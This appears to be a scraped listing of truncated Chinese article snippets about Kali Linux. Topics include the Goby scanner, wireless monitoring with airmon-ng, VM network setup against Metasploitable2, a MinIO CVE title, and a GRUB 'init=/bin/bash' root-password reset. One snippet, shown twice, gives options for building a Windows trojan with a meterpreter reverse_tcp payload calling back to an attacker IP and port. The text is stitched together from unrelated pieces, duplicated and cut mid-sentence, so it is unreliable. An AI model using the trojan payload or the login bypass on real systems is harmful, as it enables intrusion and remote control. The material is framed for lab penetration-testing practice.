kali背景基于Debian的Linux操作系统  KaliLinux是基于Debian的Linux发行版，设计用于数字取证操作系统。每一季度更新一次。由OffensiveSecurityLtd维护和资助。最先由OffensiveSecurity的MatiAharoni和DevonKearns通过重写BackTrack来完成，BackTrack是他们之前写的用于取证的Linux发行版。【百度百科Kali详情|kali中文论坛|kaliDocs文档】  kali官网地址：https://www.kali.org/get-kali/#kali-platformskali官网主页英文官网主页：翻译后

目录一、介绍：二、特性：三、准备：3.1、简介： 3.2、权限配置：3.2.1、Windows用户3.2.2、MacOS用户四、Goby下载：4.1、官网：五、使用：六、功能： 6.1、扫描6.2、资产收集6.2.1、获取更多资产信息：6.3、漏洞利用6.4、生成报告6.5、扩展程序一、介绍：（自动化方式）针对一个目标企业梳理最全的攻击面信息，同时能进行高效、实战化漏洞扫描，并快速的从一个验证入口点，切换到横向。二、特性：实战性：关注真正用于实际攻击的漏洞数量，以及漏洞的利用深度（不关注漏洞库的数量）体系性：打通渗透前，渗透中，以及渗透后的完整流程完整DOM事件收集，自动化触发。高效性：利用积

目录一、介绍：二、特性：三、准备：3.1、简介： 3.2、权限配置：3.2.1、Windows用户3.2.2、MacOS用户四、Goby下载：4.1、官网：五、使用：六、功能： 6.1、扫描6.2、资产收集6.2.1、获取更多资产信息：6.3、漏洞利用6.4、生成报告6.5、扩展程序一、介绍：（自动化方式）针对一个目标企业梳理最全的攻击面信息，同时能进行高效、实战化漏洞扫描，并快速的从一个验证入口点，切换到横向。二、特性：实战性：关注真正用于实际攻击的漏洞数量，以及漏洞的利用深度（不关注漏洞库的数量）体系性：打通渗透前，渗透中，以及渗透后的完整流程完整DOM事件收集，自动化触发。高效性：利用积

此文章为kali生成windows木马程序，进行的后渗透测试。此操作仅供虚拟机测试，请勿使用于非法途径。一、生成windows执行木马程序-pwindows/x64/meterpreter/reverse_tcp   //载入64位payload攻击载荷，如需32位把x64去掉即可lhost=192.168.2.129                                 //设置本机kali的IP地址lport=6666                                                  //设置一个监听端口，可以随意，未被占用即可-fexe     

此文章为kali生成windows木马程序，进行的后渗透测试。此操作仅供虚拟机测试，请勿使用于非法途径。一、生成windows执行木马程序-pwindows/x64/meterpreter/reverse_tcp   //载入64位payload攻击载荷，如需32位把x64去掉即可lhost=192.168.2.129                                 //设置本机kali的IP地址lport=6666                                                  //设置一个监听端口，可以随意，未被占用即可-fexe     

一、虚拟机连接网卡1、插入网卡进行连接2、检查是否连接成功输入ifconfig看是否出现wlan0，若没成功，可以输入ifconfig-a看一下是否出现wlan03、常见问题如果虚拟机一开始并没有检测到网卡，开启usb服务即可。具体操作如下：①win+R打开运行窗口，并输入services.msc，再回车②找到VMwareUSBArbitrationService，右击启动③启动后，再进入虚拟机连接网卡二、使用airmon-ng命令查看网卡是否支持监听airmon-ng因为该命令及接下来的许多命令都要进入root模式才能运行，所以运行该命令之前需要执行su命令并输入密码进入root模式。三、开

Goby预置了最具攻击效果的漏洞引擎，覆盖Weblogic，Tomcat等最严重漏洞。每天从互联网（如CVE）会产生大量的漏洞信息，我们筛选了会被用于真实攻击的漏洞进行每日更新。Goby也提供了可以自定义的漏洞检查框架，发动了互联网的大量安全从业者贡献POC，保证持续的应急响应能力。同时，我们认为基于实际效果的检查会比基于版本的比对方式更有价值。获取方式，可查看文末⬇⬇⬇文章目录MinIOverify接口敏感信息泄露漏洞（CVE-2023-28432）MinIOverify接口敏感信息泄露漏洞（CVE-2023-28432）Englishname:MiniOverifyinterfacesen

介绍Goby是一款新的网络安全测试工具，它能够针对一个目标企业梳理最全的攻击面信息，同时能进行高效、实战化漏洞扫描，并快速地从一个验证入口点，切换到横向。我们希望能够输出更具生命力的工具，能够对标黑客的实际能力，帮助企业来有效地理解和应对网络攻击。Goby主要特性：·实战性：Goby并不关注漏洞库的数量有多么多，而是关注真正用于实际攻击的漏洞数量，以及漏洞的利用深度（最小精准体，打造权威性）；·体系性：打通渗透前，渗透中，以及渗透后的完整流程完整DOM事件收集，自动化触发。·高效性：利用积累的规则库，全自动的实现IT资产攻击面的梳理；效率提升数倍，发包更少速度更快、更精准；·平台性：发动广泛的

下载kali虚拟机、Metasploitable2靶机。分别以桥接、NAT模式设置Kali虚拟机。截图并说明不同模式下物理机、Kali虚拟机IP地址的关系（是否同在一个子网）1.首先查看本机的IP地址和子网掩码： 2.打开Kali虚拟机，以桥接的模式设置Kali虚拟机3.查看桥接的模式下Kali虚拟机的IP地址和子网掩码 可以看到虚拟机和物理机在同一个网段下，将虚拟机的ip和虚拟机的子网掩码做与运算，得到的结果和物理机的ip和子网掩码做与运算的结果一致，因此他们在同一个子网下。 4.用NAT的模式设置Kali虚拟机5.查看NAT模式下Kali虚拟机的IP地址和子网掩码 将虚拟机的ip和虚拟机的

 当前使用的kali镜像版本：kali-linux-2022.1该方法同样适用于镜像版本：kali-linux-2020.31、重启进入如下界面，按⬇选择AdvancedoptionsforkaliGNU/Linux，回车；2、选择KaliGNU/Linux,withLinux5.15.0-kal（没有i)，按e进行编辑；3、按⬇找到linux开头那一项，并使用➡将光标移动到roquietsplash附近；4、此时有两种修改方法：4.1、第一种方法：将roquietsplash修改成rwinit=/bin/bash,如下图：第二种方法,将roquietsplash中的ro改成rw，最后面追加‘